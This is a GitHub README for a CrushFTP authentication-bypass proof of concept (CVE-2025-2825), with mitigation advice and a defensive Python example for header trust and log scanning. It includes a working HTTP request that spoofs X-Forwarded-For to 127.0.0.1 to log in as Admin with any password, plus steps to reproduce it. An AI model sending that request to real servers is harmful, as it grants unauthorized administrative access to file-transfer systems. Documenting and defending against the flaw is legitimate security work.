Shivshantp/CVE-2025-2825-CrushFTP-AuthBypass
🚨 CVE-2025-2825 – CrushFTP Authentication Bypass

🔎 Overview

CVE-2025-2825 is a critical authentication bypass vulnerability affecting CrushFTP, a widely used secure file transfer server. The flaw allows remote attackers to bypass login authentication and gain administrative access by spoofing headers — tricking the server into thinking the request came from localhost.

  • Severity: Critical
  • CVSS Score: 9.8
  • Attack Vector: Remote
  • Affected Versions: CrushFTP < v10.6.0
  • Fixed In: v10.6.0 and above
  • Status: Under active exploitation in the wild

🧠 Technical Details

The vulnerability arises due to improper validation of the X-Forwarded-For header. When this header is set to 127.0.0.1, the server treats the request as local — bypassing authentication.


🧪 Proof of Concept (PoC)

🔸 HTTP Request Example:

GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1
Host: target-ip
X-Forwarded-For: 127.0.0.1

📝 Replace target-ip with the actual IP address of the target CrushFTP server.

If successful, the server bypasses authentication and grants access — even with incorrect credentials.


🔗 PoC Python Script

📄 cve-2025-2825-poc.py


🛠️ Tools & Technologies Used

  • Python – scripting the exploit
  • Burp Suite – intercepting and modifying HTTP headers
  • Wireshark – packet capture and analysis
  • Nmap – port scanning and service enumeration
  • CrushFTP – vulnerable target instance
  • GitHub – for publishing PoC and documentation

📝 Steps to Reproduce

  1. Set up a vulnerable version of CrushFTP (v10.5 or earlier).
  2. Intercept the login request using Burp Suite.
  3. Modify the HTTP request header: X-Forwarded-For: 127.0.0.1
  4. Forward the request.
  5. Admin access is granted without valid credentials.

✅ Mitigation

  • Upgrade to CrushFTP v10.6.0 or higher.
  • Sanitize and validate headers like X-Forwarded-For.
  • Restrict admin access to localhost or behind a VPN/firewall.
  • Monitor logs for suspicious access patterns.
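The following is an added example, not code from this repository or from CrushFTP, illustrating the two defensive points above and the header-trust problem described under Technical Details. It contrasts a naive "believe X-Forwarded-For from anyone" check with a hardened check that only honours the header when the TCP peer is a trusted reverse proxy, and it scans access-log lines for untrusted peers that claim a loopback address. The trusted-proxy address, the log format and the log lines are all constructed for the example.

```python
import ipaddress
import re

LOOPBACK = ipaddress.ip_network("127.0.0.0/8")
# Reverse proxies allowed to set X-Forwarded-For. Placeholder address for this example;
# a real deployment lists its own proxy addresses here.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def client_ip_naive(peer_ip, headers):
    """Weak check: believe X-Forwarded-For from any peer (the behaviour the page describes)."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return ipaddress.ip_address(xff.split(",")[0].strip())
    return ipaddress.ip_address(peer_ip)


def client_ip_hardened(peer_ip, headers):
    """Hardened check: honour X-Forwarded-For only when the TCP peer is a trusted proxy,
    and then use the rightmost entry, which that proxy appended itself. The leftmost
    entry can be chosen freely by the client, so it is never used for trust decisions."""
    peer = ipaddress.ip_address(peer_ip)
    xff = headers.get("X-Forwarded-For")
    if not xff or peer not in TRUSTED_PROXIES:
        return peer
    try:
        return ipaddress.ip_address(xff.split(",")[-1].strip())
    except ValueError:
        return peer  # malformed header: fall back to the socket address


def is_local(resolver, peer_ip, headers):
    """True when the resolver decides the request originates from loopback."""
    return resolver(peer_ip, headers) in LOOPBACK


# Constructed access-log lines: combined-log style with the X-Forwarded-For value appended
# as xff="...". Line 1 is the spoofing pattern from the PoC seen from an external address.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Apr/2025:10:00:01 +0000] "GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1" 200 xff="127.0.0.1"
10.0.0.5 - - [01/Apr/2025:10:00:02 +0000] "GET /WebInterface/ HTTP/1.1" 200 xff="198.51.100.4, 10.0.0.5"
127.0.0.1 - - [01/Apr/2025:10:00:03 +0000] "GET /WebInterface/ HTTP/1.1" 200 xff="-"
203.0.113.9 - - [01/Apr/2025:10:00:04 +0000] "GET /WebInterface/login.html HTTP/1.1" 200 xff="-"
"""

LOG_RE = re.compile(
    r'^(?P<peer>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) xff="(?P<xff>[^"]*)"$'
)


def find_spoofed_local(log_text):
    """Return entries where a peer that is neither loopback nor a trusted proxy
    presents a loopback address in X-Forwarded-For."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        peer = ipaddress.ip_address(m["peer"])
        if peer in TRUSTED_PROXIES or peer in LOOPBACK:
            continue
        for hop in m["xff"].split(","):
            try:
                claimed = ipaddress.ip_address(hop.strip())
            except ValueError:
                continue  # "-" or garbage: nothing claimed
            if claimed in LOOPBACK:
                hits.append({"peer": str(peer), "time": m["ts"], "request": m["req"], "xff": m["xff"]})
                break
    return hits


if __name__ == "__main__":
    spoof = {"X-Forwarded-For": "127.0.0.1"}
    print("naive    treats external peer as local:", is_local(client_ip_naive, "203.0.113.7", spoof))
    print("hardened treats external peer as local:", is_local(client_ip_hardened, "203.0.113.7", spoof))
    for hit in find_spoofed_local(SAMPLE_LOG):
        print("ALERT spoofed loopback claim:", hit)
```

The same rule applies to any reverse-proxy header (X-Real-IP, Forwarded): a server should take the peer address from the socket unless that socket belongs to a proxy it controls, and the log check above is cheap enough to run continuously against the web-interface access log.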

👨‍💻 Author

Shivshant Patil
Certified Ethical Hacker (CEH v13)
B.Tech Computer Engineering Graduate
🔗 LinkedIn Profile 🔗 Github Profile


📚 References

About

Authentication Bypass PoC for CVE-2025-2825 – Exploiting CrushFTP 10.x